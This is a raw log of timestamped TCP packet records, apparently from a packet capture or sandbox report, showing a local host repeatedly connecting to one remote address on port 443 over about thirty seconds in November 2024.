Nov 26, 2024 08:12:27.155661106 CET	443	49942	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:27.155750990 CET	49942	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.155903101 CET	49942	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.155941010 CET	443	49942	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:27.155999899 CET	49942	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.165448904 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.165493011 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:27.165585995 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.165998936 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:27.166012049 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:28.625432014 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:28.625680923 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:28.627191067 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:28.627207994 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:28.627549887 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:28.629266024 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:28.675328970 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.153637886 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.153721094 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.153839111 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.154036999 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.154056072 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.154095888 CET	49943	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.154103041 CET	443	49943	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.325747013 CET	49949	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.325790882 CET	443	49949	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.325886011 CET	49949	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.325982094 CET	49949	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.326066971 CET	443	49949	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.326126099 CET	49949	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.335174084 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.335223913 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:29.335309029 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.335644007 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:29.335656881 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:30.796050072 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:30.796189070 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:30.797641039 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:30.797661066 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:30.797926903 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:30.799211979 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:30.843333006 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.325048923 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.325120926 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.325500965 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.325500965 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.329178095 CET	49950	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.329226971 CET	443	49950	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.501698017 CET	49956	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.501761913 CET	443	49956	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.501872063 CET	49956	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.502017021 CET	49956	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.502063990 CET	443	49956	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.502123117 CET	49956	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.511580944 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.511624098 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:31.511734009 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.512058020 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:31.512082100 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:32.969122887 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:32.969435930 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.052138090 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.052159071 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.052546978 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.054322958 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.099330902 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.499056101 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.499138117 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.499193907 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.499540091 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.499540091 CET	49957	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.499558926 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.499567986 CET	443	49957	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.687856913 CET	49963	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.687916994 CET	443	49963	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.687985897 CET	49963	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.688261032 CET	49963	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.688304901 CET	443	49963	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.688359976 CET	49963	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.699721098 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.699815035 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:33.699898005 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.700310946 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:33.700339079 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.120239973 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.120345116 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.121712923 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.121728897 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.121997118 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.123234987 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.167330980 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.922117949 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.922187090 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.922287941 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.922532082 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.922549963 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:35.922568083 CET	49964	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:35.922574043 CET	443	49964	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:36.096049070 CET	49970	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.096101999 CET	443	49970	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:36.096189022 CET	49970	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.096311092 CET	49970	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.096353054 CET	443	49970	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:36.096399069 CET	49970	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.106887102 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.106929064 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:36.107021093 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.107625008 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:36.107642889 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.475650072 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.475728035 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.477560997 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.477566957 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.477857113 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.479156017 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.523334980 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.985250950 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.985333920 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.985394955 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.985611916 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.985625029 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:37.985639095 CET	49971	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:37.985645056 CET	443	49971	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:38.161597967 CET	49978	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.161643982 CET	443	49978	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:38.161900043 CET	49978	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.161900043 CET	49978	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.162039042 CET	443	49978	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:38.162179947 CET	49978	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.171673059 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.171715021 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:38.171798944 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.172178984 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:38.172190905 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:39.583458900 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:39.583563089 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:39.585680962 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:39.585686922 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:39.585992098 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:39.587744951 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:39.635335922 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.103040934 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.103128910 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.103208065 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.103442907 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.103442907 CET	49979	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.103461981 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.103472948 CET	443	49979	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.278304100 CET	49985	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.278371096 CET	443	49985	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.278522015 CET	49985	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.278717041 CET	49985	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.278830051 CET	443	49985	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.278915882 CET	49985	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.288615942 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.288662910 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:40.288748980 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.289061069 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:40.289074898 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:41.748128891 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:41.748297930 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:41.750066042 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:41.750072002 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:41.750452042 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:41.751925945 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:41.795324087 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.276931047 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.277012110 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.277091980 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.277405024 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.277420998 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.277434111 CET	49986	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.277440071 CET	443	49986	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.454072952 CET	49992	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.454135895 CET	443	49992	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.454214096 CET	49992	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.454356909 CET	49992	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.454404116 CET	443	49992	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.454452038 CET	49992	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.465842009 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.465887070 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:42.465977907 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.467241049 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:42.467259884 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:43.888427973 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:43.888556957 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:43.890178919 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:43.890189886 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:43.890448093 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:43.891769886 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:43.939330101 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.406183004 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.406289101 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.406374931 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.406671047 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.406697035 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.406718016 CET	49993	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.406727076 CET	443	49993	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.598004103 CET	49999	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.598059893 CET	443	49999	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.598120928 CET	49999	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.598237038 CET	49999	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.598285913 CET	443	49999	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.598449945 CET	49999	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.608174086 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.608210087 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:44.608351946 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.608676910 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:44.608686924 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.022576094 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.022721052 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.024245977 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.024255037 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.024519920 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.025769949 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.071332932 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.544049025 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.544135094 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.544193029 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.544461966 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.544501066 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.544521093 CET	50000	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.544532061 CET	443	50000	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.721126080 CET	50006	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.721148014 CET	443	50006	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.721218109 CET	50006	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.721299887 CET	50006	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.721409082 CET	443	50006	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.721474886 CET	50006	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.730467081 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.730487108 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:46.730570078 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.730878115 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:46.730894089 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.152676105 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.152774096 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.178352118 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.178375959 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.179426908 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.180927992 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.223335981 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.677303076 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.677397966 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.677458048 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.677747965 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.677766085 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.677782059 CET	50007	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.677788973 CET	443	50007	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.856249094 CET	50013	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.856297016 CET	443	50013	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.856411934 CET	50013	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.857501030 CET	50013	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.857578993 CET	443	50013	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.857690096 CET	50013	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.867036104 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.867073059 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:48.867204905 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.867497921 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:48.867516994 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.278584003 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.278727055 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.280395031 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.280406952 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.280673027 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.281857967 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.323369980 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.819891930 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.819950104 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.820046902 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.825368881 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.825383902 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:50.825396061 CET	50014	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:50.825401068 CET	443	50014	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:51.001724005 CET	50019	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.001785040 CET	443	50019	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:51.001858950 CET	50019	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.002048016 CET	50019	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.002119064 CET	443	50019	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:51.002175093 CET	50019	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.011445045 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.011497021 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:51.011558056 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.011948109 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:51.011961937 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.421926975 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.422055960 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.423437119 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.423445940 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.423790932 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.425172091 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.471327066 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.939841986 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.939944029 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.940059900 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.940469980 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.940469980 CET	50020	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:52.940493107 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:52.940501928 CET	443	50020	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:53.112890005 CET	50026	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.112938881 CET	443	50026	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:53.113045931 CET	50026	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.113168955 CET	50026	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.113223076 CET	443	50026	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:53.113329887 CET	50026	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.122278929 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.122344971 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:53.122438908 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.122737885 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:53.122752905 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:54.490317106 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:54.490536928 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:54.492106915 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:54.492120028 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:54.492394924 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:54.493738890 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:54.539329052 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.001497030 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.001585960 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.001794100 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.001986980 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.002016068 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.002034903 CET	50027	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.002042055 CET	443	50027	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.178874016 CET	50032	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.178942919 CET	443	50032	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.179029942 CET	50032	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.179133892 CET	50032	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.179203987 CET	443	50032	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.179265022 CET	50032	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.188688040 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.188726902 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:55.188832998 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.189168930 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:55.189183950 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:56.648883104 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:56.649069071 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:56.650346041 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:56.650355101 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:56.650614023 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:56.652147055 CET	50033	443	192.168.2.6	50.7.187.218
